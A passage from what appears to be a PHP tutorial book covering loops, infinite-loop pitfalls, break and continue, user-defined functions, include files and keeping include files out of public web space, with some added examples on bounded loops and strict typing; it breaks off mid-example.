checked. In a while loop, the condition is checked at the top of the loop. 
Therefore, the loop will never execute if the condition is never true. In 
the do..while loop, the condition is checked at the bottom of the loop. 
Therefore, the loop always executes at least once, even if the condition is 
never true. 

For example, in the preceding loop that checks for an apple, suppose the 
original condition is set to yes, instead of no, by using this statement: 

$testvar = "yes"; 

The condition tests false from the beginning. It is never true. In a while 
loop, there is no output. The statement block never runs. However, in a 
do..while loop, the statement block runs once before the condition is 
tested. Thus, the while loop produces no output, but the do..while loop 
produces the following output: 

orange is not an apple 

The do..while loop produces one line of output before the condition is 
tested. It doesn’t produce the second line of output because the condition 
tests false. 

Avoiding infinite loops 

You can easily set up loops so that they never stop. These are called infinite 
loops. They repeat forever. However, seldom does anyone create an infinite 
loop intentionally. It’s usually a mistake in the programming. For example, 
a slight change to the script that sets up a while loop can make it into an 
infinite loop. 

Here is the script shown in the section “Using while loops,” earlier in this 
chapter, with a slight change: 

$fruit = array ( "orange", "apple", "grape" ); 
$testvar = "no"; 
while ( $testvar != "yes" ) 
{ 
    $k = 0; 
    if ($fruit[$k] == "apple" ) 
    { 
        $testvar = "yes"; 
        echo "apple\n"; 
    } 
    else 
    { 
        echo "$fruit[$k] is not an apple\n"; 
    } 
    $k++; 
} 


The small change is moving the statement $k = 0; from outside the loop 
to inside the loop. This small change makes it into an endless loop. This 
changed script has the following output: 


orange is not an apple 
orange is not an apple 
orange is not an apple 
orange is not an apple 

This will repeat forever. Every time the loop runs, it resets $k to 0. Then it 
gets $fruit[0] and echoes it. At the end of the loop, $k is incremented to 1. 
However, when the loop starts again, $k is set back to 0. Consequently, only 
the first value in the array, orange, is ever read. The loop never gets to the 
apple, and $testvar is never set to "yes". The loop is endless. 

Don’t be embarrassed if you write an infinite loop. We guarantee that the 
best programming guru in the world has written many infinite loops. It isn’t a 
big deal. If you’re testing a script and get output repeating endlessly, there’s 
no need to panic. Do one of the following: 

♦ If you’re using PHP on a web page: Wait. It will stop by itself in a short 
time. The default time is 30 seconds, but the timeout period might have 
been changed by the PHP administrator. You can also click the Stop 
button on your browser to stop the display in your browser. 

♦ If you’re using PHP CLI: Press Ctrl+C (or Cmd+C on a Mac). This stops 
the script from running. Sometimes the output will continue to display a 
little longer, but it will stop very shortly. 

Then figure out why the loop is repeating endlessly and fix it. 

A common mistake that can result in an infinite loop is using a single equal 
sign (=) when you mean to use double equal signs (==). The single equal 
sign stores a value in a variable; the double equal signs test whether two 
values are equal. The following condition using a single equal sign is always 
true: 

while ($testvar = "yes") 

The condition simply sets $testvar equal to "yes". This isn’t a question 
that can be false. What you probably meant to write is this: 

while ($testvar == "yes") 

This is a question asking whether $testvar is equal to "yes", which can 
be answered either true or false. 

Another common mistake is to leave out the statement that increments the 
counter. For example, in the script earlier in this section, if you leave out the 
statement $k++;, $k is always 0, and the result is an infinite loop. 

Breaking out of a loop 

Sometimes you want your script to break out of a loop. PHP provides two 
statements for this purpose: 

♦ break: Breaks completely out of a loop and continues with the script 
statements after the loop. 

♦ continue: Skips to the end of the loop where the condition is tested. 
If the condition tests positive, the script continues from the top of the 
loop. 

The break and continue statements are usually used in conditional 
statements. In particular, break is used most often in switch statements, 
discussed earlier in this chapter. 

The following statements show the difference between continue and 
break. This first chunk of code shows an example of the break statement: 

$counter = 0; 
while ( $counter < 5 ) 
{ 
    $counter++; 
    if ( $counter == 3 ) 
    { 
        echo "break\n"; 
        break; 
    } 
    echo "Last line in loop: counter=$counter\n"; 
} 
echo "First line after loop\n\n"; 

The output of this statement is the following: 

Last line in loop: counter=1 
Last line in loop: counter=2 
break 

First line after loop 

Notice that the first loop ends at the break statement. It stops looping and 
jumps immediately to the statement after the loop. That isn’t true of the 
continue statement. 

The following code gives you an example of the continue statement: 

$counter = 0; 
while ( $counter < 5 ) 
{ 
    $counter++; 
    if ( $counter == 3 ) 
    { 
        echo "continue\n"; 
        continue; 
    } 
    echo "Last line in loop: counter=$counter\n"; 
} 
echo "First line after loop\n"; 

The output of this statement is the following: 

Last line in loop: counter=1 

Last line in loop: counter=2 

continue 

Last line in loop: counter=4 

Last line in loop: counter=5 

First line after loop 

Unlike the break statement loop, this loop does not end at the continue 
statement. It just stops the third repeat of the loop and jumps back up to the 
top of the loop. It then finishes the loop, with the fourth and fifth repeats, 
before it goes to the statement after the loop. 


One use for break statements is insurance against infinite loops. The following 
statements inside a loop can stop it at a reasonable point: 

$test4infinity++; 

if ($test4infinity > 100 ) 

{ 

break; 

} 

If you’re sure that your loop should never repeat more than 100 times, 
use these statements to stop the loop if it becomes endless. Use whatever 
number seems reasonable for the loop you’re building. 
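
The apple search from “Using while loops” can also run forever when the array holds no apple, because $k runs past the last element and $testvar never changes. The following is an added example, not code from the book, that bounds the search by the array length and keeps the iteration cap as a backstop; find_fruit() and MAX_ITERATIONS are hypothetical names.

```php
<?php
// Added example (not from the book): a search loop that always terminates.
// find_fruit() and MAX_ITERATIONS are hypothetical names chosen for illustration.

const MAX_ITERATIONS = 100;   // upper limit on work done by one search

/**
 * Returns the position of $wanted in $fruit, or -1 if it is not present.
 * Throws if the loop would need more than MAX_ITERATIONS passes.
 */
function find_fruit(array $fruit, string $wanted): int
{
    $items = array_values($fruit);   // make sure keys are 0, 1, 2, ...
    $last  = count($items);
    $k = 0;
    $passes = 0;

    // Bound 1: stop at the end of the array. The chapter's loop tests only
    // $testvar, so with no match it keeps reading $fruit[$k] past the end.
    while ($k < $last) {
        // Bound 2: the "insurance" counter, reported as an error instead of
        // a silent break so an oversized input is noticed.
        if (++$passes > MAX_ITERATIONS) {
            throw new RuntimeException(
                "search stopped after " . MAX_ITERATIONS . " passes"
            );
        }

        // === compares type and value; writing = here by mistake would be
        // an assignment that is always true for a non-empty string.
        if ($items[$k] === $wanted) {
            return $k;
        }
        $k++;   // leaving this out would make the loop endless again
    }
    return -1;
}

// Constructed sample input, matching the array used in this chapter.
$fruit = array("orange", "apple", "grape");

foreach (array("apple", "banana") as $wanted) {
    $position = find_fruit($fruit, $wanted);
    if ($position >= 0) {
        echo "$wanted found at position $position\n";
    } else {
        echo "$wanted is not in the array\n";
    }
}

// An input longer than the cap is refused instead of being scanned.
try {
    find_fruit(array_fill(0, 500, "orange"), "apple");
} catch (RuntimeException $e) {
    echo "refused: ", $e->getMessage(), "\n";
}
```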


Using Functions 

Applications often perform the same task at different points in the script or 
in different scripts. Functions are designed to allow you to reuse the same 
code in different locations. A function is a group of PHP statements that perform 
a specific task. You can use the function wherever you need to perform 
the task. 


For example, suppose you display your company logo frequently throughout 
your website with the following statements: 

echo "<p><img src='Images/logo.jpg' width='50' height='50' 
hspace='10' align='left' /></p>"; 
echo "<p style='font-size: x-large'>My Fine Company</p>"; 
echo "<p style='font-style: italic'>quality products</p>"; 

Rather than typing this code in every place in your scripts where you want 
to display your logo, you can create a function that contains the statements 
and name it display_logo. Then, you can just use the function whenever 
you want to display your logo. Using the function looks like this: 

display_logo(); 

You can see that using this one line saves a lot of typing and is easier to read 
and understand than typing the echo statements everywhere the logo is 
needed. In the sections that follow, we tell you how to create and call a function, 
use variables within functions, pass and return values to and from 
functions, and simplify your work with PHP’s built-in functions. 

Creating a function 

You can create a function by putting the code into a function block. The 
general format is as follows: 

function functionname() 
{ 

block of statements; 
return; 

} 

For example, you can create the function display_logo () that we discuss 
in the preceding section with the following statements: 

function display_logo() 
{ 
    echo "<p><img src='Images/logo.jpg' width='50' height='50' 
    hspace='10' align='left' /></p>"; 
    echo "<p style='font-size: x-large'>My Fine Company</p>"; 
    echo "<p style='font-style: italic'>quality products</p>"; 
    return; 
} 

You can then call the function anywhere you want to display the logo, as 
follows: 

display_logo(); 

The return statement at the end of the preceding function stops the function 
and returns control to the main script. A return statement isn’t needed at 
the end of the function, because the function stops at the end anyway and 
returns control to the calling script. However, the return statement makes 
the function easier to understand. The return statement is discussed in 
more detail in the section “Returning a value from a function,” later in this 
chapter. 

You can create a function with a function-definition statement anywhere in 
the script, but the usual practice is to put all the functions together at the 
beginning or the end of the script. Functions that you plan to use in more 
than one script can be defined in a separate file that you include in any 
scripts that need to use the functions. Including files in scripts is discussed 
in the section, “Organizing Scripts,” later in this chapter. 

Using variables in functions 

You can create and use a variable inside your function. Such a variable is 
called local to the function. However, the variable isn’t available outside of 
the function; it isn’t available to the main script. If you want to use the variable 
outside the function, you have to make the variable global, rather than 
local, by using a global statement. For instance, the variable $name is 
created in the following function: 

function format_name() 
{ 
    $first_name = "John"; 
    $last_name = "Smith"; 
    $name = $last_name.", ".$first_name; 
} 

format_name(); 
echo "$name"; 

These statements don’t produce any output. In the echo statement, $name 
doesn’t contain any value. The variable $name was created inside the function, 
so it doesn’t exist outside the function. 


You can create a variable inside a function that does exist outside the function 
by using the global statement. The following statements contain the same 
function with a global statement added: 

function format_name() 

{ 

global $name; 

$first_name = "John"; 

$last_name = "Smith"; 

$name = $last_name . ", " . $first_name; 

} 

format_name(); 
echo "$name"; 

The script now echoes this: 

Smith, John 



You must make the variable global before you can use it. If the global statement 
follows the $name assignment statement, the script doesn’t produce any 
output. That is, in the preceding function, if the global statement followed 
the $name = statement, the function wouldn’t work correctly. 


Similarly, if a variable is created outside the function, you can’t use it inside 
the function unless it’s global. In the following statements, the only global 
statement is inside the function: 


$first_name = "John"; 

$last_name = "Smith"; 
function format_name() 

{ 

global $first_name, $last_name; 

$name = $last_name.", ".$first_name; 
echo "$name"; 

} 

format_name(); 




Because the code didn’t include a global statement outside the function, 
$last_name and $first_name inside the function are different variables 
than $last_name and $first_name created in the script outside the function. 
The variables $last_name and $first_name inside the function are 
created when you name them and have no values. Therefore, $name echoes 
only a comma, as follows: 


You need the global statement for the function to work correctly. 

Passing values to a function 

You pass values to a function by putting the values between the parentheses 
when you call the function, as follows: 

functionname(value,value,...); 

Of course, the variables can’t just show up. The function must be expecting 
them. The function statement includes variables’ names for the values it’s 
expecting, as follows: 

function functionname($varname1,$varname2,...) 

{ 

statements 

return; 

} 

For example, the following function computes the sales tax: 

function compute_salestax($amount,$custState) 

{ 

switch ( $custState ) 

{ 

case "OR" : 

$salestaxrate = 0; 
break; 
case "CA" : 

$salestaxrate = 1.0; 
break; 
default: 

$salestaxrate = .5; 
break; 

} 

$salestax = $amount * $salestaxrate; 
echo "$salestax<br />"; 

} 

The first line shows that the function expects two values — $amount and 
$custState. When you call the function, you pass it two values, as follows: 

$amount = 2000.00; 

$custState = "CA"; 

compute_salestax($amount,$custState); 

In this case, the amount passed in is 2000.00 and the state is CA. The output 
is 2000, because the salestaxrate for CA is 1.0. 

Passing the right type of values 

You can pass values directly, including computed values, or you can pass 
variables containing values. The following calls are valid: 

compute_salestax(2000,"CA") ; 
compute_salestax(2*1000, "") ; 
compute_salestax(2000,"C"."A") ; 

You can pass values of any data type. See Chapter 1 in this minibook for 
a discussion of data types. Generally, you want to test the values that are 
passed to check whether the values are the expected data type. For example, 
the following function expects an array: 

function add_numbers($numbers) 
{ 
    if(is_array($numbers)) 
    { 
        $sum = 0;   // start the total at zero so no undefined variable is read 
        for($i=0;$i<sizeof($numbers);$i++) 
        { 
            $sum = $sum + $numbers[$i]; 
        } 
        echo $sum; 
    } 
    else 
    { 
        echo "value passed is not an array"; 
        return; 
    } 
} 

You can use the following statements to call the add_numbers function: 

$arrayofnumbers = array(100,200); 
add_numbers($arrayofnumbers); 

The function displays 300, which is the sum of 100 plus 200. If the value 
passed isn’t an array, as follows: 


add_numbers(100); 

the function displays the message: 

value passed is not an array 


Passing values in the correct order 

The function receives the values in the order they are passed. That is, suppose 
you have the following function: 

function functionx($x,$y,$z) 
{ 
    do stuff 
} 

You call the function, as follows: 

functionx($var1,$var2,$var3); 

functionx sets $x=$var1, $y=$var2, and $z=$var3. 

If the values you pass aren’t in the expected order, the function uses the 
wrong value when performing the task. For instance, perhaps your definition 
for a function to compute sales tax looks like the following: 

function compute_salestax($orderCost, $custState) 

{ 

compute tax 

} 

Here, $orderCost is the cost of the order, and $custState is the state 
the customer resides in. But suppose you use the following call: 

compute_salestax($custState,$orderCost); 

The function uses the value of the $custState variable as the cost of the 
order, which it sets to 0, because it is a string. It sets the $custState 
variable to the number in $orderCost, which wouldn’t match any of its 
categories. The output would be 0. 

Passing the right number of values 

A function is designed to expect a certain number of values to be passed to it. 
If you don’t send enough values, the function sets the missing one(s) to null. 
If you have your warning message level turned on, a warning message is displayed. 
(See the section about understanding error messages in Chapter 1 
in this minibook for a description of error levels.) For example, suppose you 
have the following function that formats a name: 

function format_name($first_name,$last_name) 
{ 
    $name = "$last_name, ".$first_name; 
    echo $name; 
} 

The function expects two values to be passed to it. Suppose you call it with 
the following statement: 

format_name("John"); 

You see a message similar to the following: 

Warning: Missing argument 2 for format_name() in testing.php 
on line 9 

However, warnings don’t stop the script; it continues to run. So, the script 
outputs the following: 

, John 

If you send too many values, the function ignores the extra values. In most 
cases, you don’t want to pass the wrong number of values, although this can 
be useful in a few rare instances. 

You can set default values to be used when a value isn’t passed. The defaults 
are set when you write the function, as follows: 

function add_2_numbers($num1=1,$num2=1) 
{ 
    $total = $num1 + $num2; 
    echo "total = $total"; 
} 

If one or both of the values aren’t passed to the function, the function 
uses the assigned defaults, but if a value is passed, it is used instead of the 
default. For instance, you might use one of the following calls: 

add_2_numbers(2,2) ; 
add_2_numbers(2) ; 
add_2_numbers(); 

The results are, in consecutive order: 

$total = 4 
$total = 3 
$total = 2 
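
The three checks discussed above (right type, correct order, right number of values) can be enforced by PHP itself rather than left to warnings. This is an added example, not the book's code: it rewrites this chapter's compute_salestax() with type declarations and strict typing, and the negative-amount check and the try_call() helper are assumptions added for illustration.

```php
<?php
declare(strict_types=1);   // arguments are not silently converted between types

// Added example (not from the book). Requires PHP 7.4 or later for fn().
// The tax rates are the ones used in this chapter's compute_salestax().
function compute_salestax(float $amount, string $custState): float
{
    // Assumption for this example: a negative order amount is invalid input.
    if ($amount < 0) {
        throw new InvalidArgumentException("amount must not be negative");
    }

    switch ($custState) {
        case "OR":
            $salestaxrate = 0.0;
            break;
        case "CA":
            $salestaxrate = 1.0;
            break;
        default:
            $salestaxrate = 0.5;
            break;
    }

    // Return the value instead of echoing it, so the caller decides
    // how and where it is displayed.
    return $amount * $salestaxrate;
}

// Hypothetical helper: runs one call and reports the result or the reason
// PHP refused it. ArgumentCountError is a subclass of TypeError, so it is
// caught first.
function try_call(callable $call): string
{
    try {
        return "ok: " . $call();
    } catch (ArgumentCountError $e) {          // too few values passed
        return "rejected (count): " . $e->getMessage();
    } catch (TypeError $e) {                   // wrong type, e.g. swapped order
        return "rejected (type): " . $e->getMessage();
    } catch (InvalidArgumentException $e) {    // right type, unacceptable value
        return "rejected (value): " . $e->getMessage();
    }
}

// Constructed sample calls.
echo try_call(fn() => compute_salestax(2000.00, "CA")), "\n";   // valid
echo try_call(fn() => compute_salestax("CA", 2000.00)), "\n";   // order swapped
echo try_call(fn() => compute_salestax(2000.00)), "\n";         // one value missing
echo try_call(fn() => compute_salestax(-5.00, "CA")), "\n";     // bad value
```

With the declarations in place, a swapped or missing argument stops the call with an exception instead of producing a tax of 0 or a warning followed by wrong output.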

Passing values by reference 

When you pass values into variables in the function definition as shown so 
far, you’re passing by value. Passing by value is the most common way to 
pass values to a function, as follows: 

function add_1($num1) 
{ 
    $num1 = $num1 + 1; 
} 

When passing by value, copies are made of $num1 and are passed to the 
function. While $num1 is changed inside the function, by adding 1 to it, the 
variable $num1 outside of the function is not changed. So, if you call the 
function with the following statements: 

$num1 = 3; 
add_1($num1); 
echo $num1; 

The output is 

3 

$num1 still contains the same value as it did before you called the function. 
You can change this by making the variable global inside the function or by 
returning $num1 from the function after it’s changed and calling the function, 
as follows: 

$num1 = add_1($num1); 

The new value of $num1 is returned from the function and stored in $num1 
outside the function. 


In some cases, you want to change the values of variables directly, changing 
their values outside the function. Passing by reference is used for this task. 
To pass a variable by reference, add & before the variable name, as follows: 

function add_1(&$num1) 
{ 
    $num1 = $num1 + 1; 
} 

When you call this function, a pointer to the location of the variable is 
passed, rather than a copy of the variable. That is, the function call passes 
a pointer to the container called $num where the value 3 is stored. When 
you change the variable with statements inside the function, the value at the 
original location is changed. So, if you call the function with the following 
statements: 

$num1 = 3; 
add_1($num1); 
echo $num1; 

the output is 

4 

Because you’re passing a pointer to a variable, the following doesn’t make 
sense: 

add_1(&7); 

Passing by reference is used mainly when passing really large values, such 
as an object or a large array. It’s more efficient to pass a pointer than to pass 
a copy of really large values. 

Returning a value from a function 

If you want a function to send a value back to the main script, use the 
return statement. The main script can put the value in a variable or use it 
in any manner it would use any value. 

To return a value from the function, put the return statement in the function. 
The general format is 

return value; 

For instance, the function that adds two numbers might look like this: 

function add_2_numbers($num1,$num2)
{
   $total = $num1 + $num2;
   return $total;
}

The total of the two numbers is returned. You call the function, as follows:

$sum = add_2_numbers(5,6);

$sum then equals the value in $total that was returned from the 
function — 11. In fact, you could use a shortcut and send the total back 
to the main script with one statement: 

return $num1 + $num2;

The main script can use the value in any of the usual ways. The following 
statements use the function call in valid ways: 

$total_height = add_2_numbers($height1,$height2);

$totalSize = $current_size + add_2_numbers($size1,$size2);

if (add_2_numbers($costSocks,$costShoes) > 200.00)
   echo "No sale";

A return statement can return only one value. However, the value returned 
can be an array, so you can actually return many values from a function. 

You can use a return statement in a conditional statement to end a function, 
as follows: 


function find_value($array,$value)
{
   for ($i = 0;$i<sizeof($array);$i++)   # array elements are numbered from 0
   {
      if ($array[$i] == $value)
      {
         echo "$i. $array[$i] <br />";
         return;
      }
   }
}

The function checks an array to see whether it contains a value. For instance, 
you can call the function with the following statements: 

$names = array("Joe","Sam","Juan");
find_value($names,"Sam"); 


The function searches through the values in the array searching for Sam. If it 
finds Sam, it stops searching. The output shows the array item where Sam is 
found, as follows: 


1. Sam 

Often functions are designed to return Boolean values (true or false), as in 
the following function: 

function is_over_100($number)
{
   if($number > 100)
   {
      return true;
   }
   else
   {
      return false;
   }
}

Numbers equal to or less than 100 return false; numbers over 100 return
true. Another common function design returns a value if the function succeeds
but returns false if the function does not succeed. For instance, you
can design the find_value function as follows:

function find_value($array,$value)
{
   for($i=0;$i<sizeof($array);$i++)   # array elements are numbered from 0
   {
      if($array[$i] == $value)
      {
         return $i;
      }
   }
   return false;
}

If the function finds the value in the array, it returns the number of the array
element where it found $value. However, if it doesn’t find the value anywhere
in the array, it returns false.
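
Because the first array element is number 0, and PHP treats 0 as equal to false in a loose comparison, code that calls a function of this design has to test the result with === or !==. The added example below (not from the book; the is_listed_loose and is_listed_strict helper names are hypothetical, and the data is constructed) shows a membership check giving the wrong answer for the first element when the loose test is used.

```php
<?php
declare(strict_types=1);

// Same design as find_value in the text: the element number on success,
// false on failure.
function find_value(array $array, $value)
{
    foreach (array_values($array) as $i => $item) {
        if ($item === $value) {
            return $i;
        }
    }
    return false;
}

// Loose test: cannot tell "found at element 0" from "not found",
// because 0 != false evaluates to false.
function is_listed_loose(array $array, $value): bool
{
    return find_value($array, $value) != false;
}

// Strict test: only the Boolean false means "not found".
function is_listed_strict(array $array, $value): bool
{
    return find_value($array, $value) !== false;
}

$names = array("Joe", "Sam", "Juan");   // constructed sample data

// "Joe" is element 0, "Sam" is element 1, "Pat" is not in the list.
foreach (array("Joe", "Sam", "Pat") as $who) {
    printf(
        "%-4s loose=%s strict=%s\n",
        $who,
        var_export(is_listed_loose($names, $who), true),
        var_export(is_listed_strict($names, $who), true)
    );
}
```

The same rule applies to built-in functions that return a position or false, such as array_search() and strpos().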

Using built-in functions

PHP’s many built-in functions are one reason why PHP is so powerful and
useful. The functions included with PHP are normal functions. They’re no
different than functions you create yourself. It’s just that PHP has already done
all the work for you.

You can call PHP’s built-in functions the same way you call functions you 
create yourself. You use the function name and pass any values the function 
needs. We discuss specific PHP functions throughout the book. For instance, 
earlier in this chapter, we discuss several functions that you can use to 
check whether a variable exists or whether it’s empty. Here are a couple of 
those functions: 

isset($varname) 
empty($varname) 

The PHP online documentation describes all the built-in functions at
www.php.net/manual/en/funcref.php. In addition, the PHP documentation
provides a search function that’s very useful when you remember the name
of the function but can’t remember the exact syntax. Type the function name
in the Search For text box at the top of the web page and choose Function
List from the drop-down list.

Organizing Scripts

A script is a series of PHP statements, and each statement performs an
action. PHP starts at the beginning of the script and executes each statement
in turn. Some statements are complex statements that execute simple statements
conditionally or repeatedly.

An application often consists of more than one PHP script. In general, one 
script performs one major task. For instance, an application might include 
a script to display a form and a script that stores the data in a database. 
However, this is a guideline, rather than a rule. Some scripts both display a 
form and process the form data. 

Each script should be organized into sections for each specific task. Start 
each section with a comment describing what the section does. (We cover 
writing comments in Book 11, Chapter 1.) Separate sections from each other 
with blank lines. For instance, a login script might have sections as follows: 

#display the login form

   statements that display the login form

#check for valid user name and password

   statements that check for valid user name and password

#display first page of website or error message

   statements that display the site if user had valid login
   or error message if login invalid



The goal is to make the script as clear and understandable as possible. 
Scripts need to be maintained and updated over a period of time, often not 
by the person who created them. The more clear and understandable they 
are, the easier to maintain and update they are. 


The following sections give you some tips and tricks for organizing your PHP 
scripts in a way that simplifies your programming tasks. 


Separating display code from logic code

One principle of good practice for writing an application is to separate the 
PHP programming logic from the HTML that displays the web page. To do 
this, the HTML that displays the page is put in a separate file. This file can 
then be used in the script wherever the web page needs to be displayed. You 
can store the HTML code that displays a form in a separate file and then use 
that code whenever the form needs to be displayed. Not only does it make 
your PHP script easier to read, but it also makes changing the form simpler. 
You can make the changes just in the file that contains the HTML code 
rather than having to find everywhere the application displays the form and 
make the changes at every location. 

For example, suppose your customer adds an item to a shopping cart.
On the shopping cart web page, you include two buttons — one that says 
Continue Shopping and one that says Log Out. When the user clicks either 
button, the following PHP script is executed: 


<?php
if($button == "Continue Shopping")
{
   include("catalog.inc");
}
else
{
   include("logout.inc");
}
?>


If the user clicks Continue Shopping, a file containing HTML code that displays
the catalog is used. If the user clicks the Log Out button, a file that
contains the HTML code for the log-out message is used. We discuss the
details of using include files later in this chapter in the “Organizing with
include files” section.


You can see how much easier the script is to read with only the include 
statement in the script, rather than with all the HTML code needed to display 
the page cluttering up the script. 


Reusing code 

Another practice that makes scripts easy to maintain is reusing code. It’s 
common to find yourself typing the same ten lines of PHP statements in 
several places in the script. You can store that block of code and reuse it 
wherever it’s needed. 

Storing reusable code separately makes the script easier to read and understand.
In addition, when the code needs changing, you just change it in one
place, rather than changing it in a dozen different places in the script.

You can reuse code by storing the code in a function and calling the function
wherever you need to perform the task. Creating and using functions is discussed
earlier in this chapter, in the “Using Functions” section.

Another way you can reuse code is to store the code in a separate file and 
incorporate the file into the script where it is needed. You can bring an 
external file into a script with an include statement, discussed later in this 
chapter in the “Organizing with include files” section. 


Organizing with functions

Make frequent use of functions to organize your scripts. Functions are useful 
when your script needs to perform the same task at repeated locations in a 
script, in different scripts in the application, and even in different applications.
After you write a function that does the task and you know it works, you can 
use it anywhere that you need it. 

Look for opportunities to use functions. Your script is much easier to read 
and understand with a line like this: 

getCustomerName(); 

than with 20 lines of statements that actually get the customer name. In fact,
after you’ve been writing PHP scripts for a while, you’ll have a stash of functions
that you’ve written for various scripts. Very often the script that you’re
writing can use a function that you wrote for another application two jobs
ago. For instance, you may often have a need for a list of the states. Rather
than include a list of all 50 states in the United States every time you need it,
you could create a function called getStateNames() that returns an array
that holds the 50 state names in alphabetical order and a function called
getStateCodes() that returns an array with all 50 two-letter state abbreviation
codes in the same order.

Always use descriptive function names. The function calls in your script 
should tell you exactly what the functions do. Long names are okay. You 
don’t want to see a line in your script that reads 

function1();

Even a line like the following is less informative than it could be: 

getData(); 

You want to see a line like this: 

getAllCustomerNames(); 


Organizing with include files

include statements bring the content of a file into your script. Thus, you 
can put statements into an external file — a file separate from your script 
file — and insert the file wherever you want in the script with the include 
statement. include statements are useful for storing statements that are
repeated. Here are some ways to use include files to organize your scripts:

♦ Put all or most of your HTML into include files. For instance, if your
script sends a form to the browser, put the HTML for the form into an
external file. When you need to send the form, use an include statement.
Putting the HTML into an include file is a good idea if the form is
shown several times. It’s even a good idea if the form is shown only once
because it makes your script much easier to read.

♦ Put your functions in include files. You don’t need the statements
for functions in the script; you can put them in an include file. If you
have a lot of functions, organize related functions into several include
files, such as data_functions.inc and form_functions.inc. Use
include statements at the top of your scripts, reading in only the functions
that are used in the script.

♦ Store statements that all the files on your website have in common.
Most websites have many web pages with many elements in common.
For instance, all web pages start with <html>, <head>, and <body>
tags. If you store the common statements in an include file, you can
include them in every web page, ensuring that all your pages look alike.
For instance, you might have the following statements in an include
file:

<html>
<head><title><?php echo $title ?></title></head>
<body topmargin="0">
<p style="text-align: center">
<img src="logo.gif" width="100" height="200">
<hr color="red" />

If you include this file at the top of every script on your website, you 
save a lot of typing, and you know that all your pages match. In addition,
if you want to change anything about the look of all your pages, you
have to change it only in one place — in the include file. 

Including files

You use an include statement to bring the content of an external text file 
into your script. The format for an include statement is 

include("filename");

The file can have any name. We, your humble book authors, like to use the
extension .inc so that we know the file is an include file as soon as we see
the name. It helps with the organization and clarity of a website.

PHP provides four types of include statements: 

♦ include: Includes and evaluates the specified file. It displays a warning 
if it can’t find the specified file. 

♦ require: Performs the same way as the include statement, except that
it produces, in addition to a warning, a fatal error when it can’t find the
specified file, stopping the script at that point.

♦ include_once: Performs the same as the include statement, except it 
includes the file only once. If the file has already been included, it won’t 
be included again. In some scripts, a file might be included more than 
once, causing function redefinitions, variable reassignments, and other
possible problems. 

♦ require_once: Performs the same as the require statement, except it 
includes the file only once. If the file has already been included, it won’t 
be included again. This statement prevents problems that might occur 
when a file is included more than once. 

The external file is included in your script at the location of the include 
statement. The content of the file is read as HTML code, not PHP. Therefore, 
if you want to use PHP statements in your include file, you must include 
PHP tags in the include file. 

Forgetting the PHP tags in the include file is a common mistake. It’s also
a security problem because without the PHP tags, the code in the include
file is displayed to the user as HTML. You don’t want your database password
displayed on your web page. We discuss include file security later in
this chapter in the section “Storing include files securely.”

Using variables in include statements

You can use a variable name for the filename, as follows: 

include("$filename");

For example, you might want to display different messages on different days.
You might store these messages in files that are named for the day on which
the message should appear. For instance, you can have a file named Sun.inc
with the following content:

<p>Go ahead. Sleep in. No work today.</p> 

and similar files for all days of the week. The following statements can be
used to display the correct message for the current day:

$today = date("D");
include("$today".".inc");

After the first statement, $today contains the day of the week, in abbreviation
form. The date statement is discussed in Chapter 1 in this minibook.
The second statement includes the correct file, using the day stored in
$today. If $today contains Sun, the statement includes a file called Sun.inc.

Storing include files securely

Where you store include files can be a security issue for websites. Files
stored on websites can be downloaded by any user, unless protected.
Theoretically, a user can connect to your website by using the following URL:

http://example.com/secretpasswords.inc

If the web server is configured to process PHP sections only in files with
the .php extension and secretpasswords.inc contains the following
statements:

<?php
$mysecretaccount="account48756";
$mypassword="secret";
?>

the web server would obligingly display the contents of secretpasswords.inc
to the user. You can protect against this in one of the following ways:

♦ Name include files with .php extensions. This needs to be done carefully
because it allows some PHP code to be run independently, without
any context. For instance, suppose you have code in your include file
that deleted a record in the database (highly unlikely). Running the code
outside of a script might have negative consequences. Also, you might
find it convenient to name files with a .inc extension, so you can see at
a glance that it’s a fragment, not a script intended to run by itself.

♦ Configure the web server to scan for PHP sections in files with the
.inc extension, as well as the .php extension. This allows you to
recognize include files by their names, but it still has the problem of
possible unintended consequences of running the file independently, as
discussed earlier.

♦ Store the file in a location that isn’t accessible to outside users. This is 
the preferred solution, but it may not be possible in some environments, 
such as when using a web hosting company. 

The best place to store include files is a directory where outside users 
cannot access them. For instance, for your website, set up an include 
directory that is outside your web space: that is, a directory in a location 
that outside users can’t access using their browsers. For instance, the 
default web space for Apache, unless it has been changed in the configuration
file (usually httpd.conf), is htdocs in the directory where Apache is
installed. If you store your include files in a directory that isn’t in your web
space, such as d:\include, you protect the files from outside users.

To include a file from a hidden directory (such as a directory outside your 
web space), you can use the full pathname to the file, as follows: 

include("d:/hidden/secretpasswords.inc"); 

However, PHP allows you to set an include directory. You can include files 
from the include directory using only the filename. 

Setting up include directories

PHP looks for include files in the current directory, where your web page
file is stored, and in one or more directories specified by a setting in your
php.ini file. You can include files from the include directory without
specifying the path to the file.

You can see the current include directory location by using the phpinfo()
statement. In the output, in the PHP core section, you can find a setting for
include_path that shows where your current include directory is located.
For example, in PHP 5, the default location might be c:\php5\pear.

You can change the setting for your include directory in the php.ini file.
Find the setting for include_path and change it to the path to your preferred
directory, as follows:

include_path=".;c:\php\include"; # for Windows 

include_path=".:/user/local/include"; # for Unix/Linux 

Both of the statements specify two directories where PHP looks for include 
files. The first directory is dot (meaning the current directory), followed by 
the second directory, path. You can specify as many include directories 
as you want and PHP will search them, in the order in which they are listed, 
to find the include file. The directory paths are separated by a semicolon 
for Windows or a colon for Unix and Linux. 

If you can’t set the path yourself in php.ini, you can set the path in each
individual script by using the following statement:

ini_set("include_path","d:\hidden");

The statement sets the include_path to the specified directory only while 
the script is running. It doesn’t set the directory for your entire website. 

To access a file from an include directory, just use the filename, as follows.
You don’t need to use the full pathname.

include("secretpasswords.inc");

If your include file isn’t in an include directory, you may need to use
the entire pathname in the include statement. If the file is in the same
directory as the script, the filename alone is sufficient. However, if the file
is located in another directory, such as a subdirectory of the directory the
script is in or in a hidden directory outside the web space, you need to use
the full pathname to the file, as follows:

include("d:\hidden\secretpasswords.inc");
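
The date("D") example under "Using variables in include statements" is safe because the script itself produces the filename. When the name in an include statement comes from a form field or URL instead, check it against a fixed list before building the path, as in this added example (not from the book), which also keeps the files in an include directory outside the web space. The helper names and the temporary directory standing in for d:/hidden are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not from the book: returns the full path of the message
// file for $day, or null when $day is not one of the seven expected names or
// the file does not exist inside $includeDir.
function day_message_path(string $includeDir, string $day): ?string
{
    $allowed = array("Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat");
    if (!in_array($day, $allowed, true)) {
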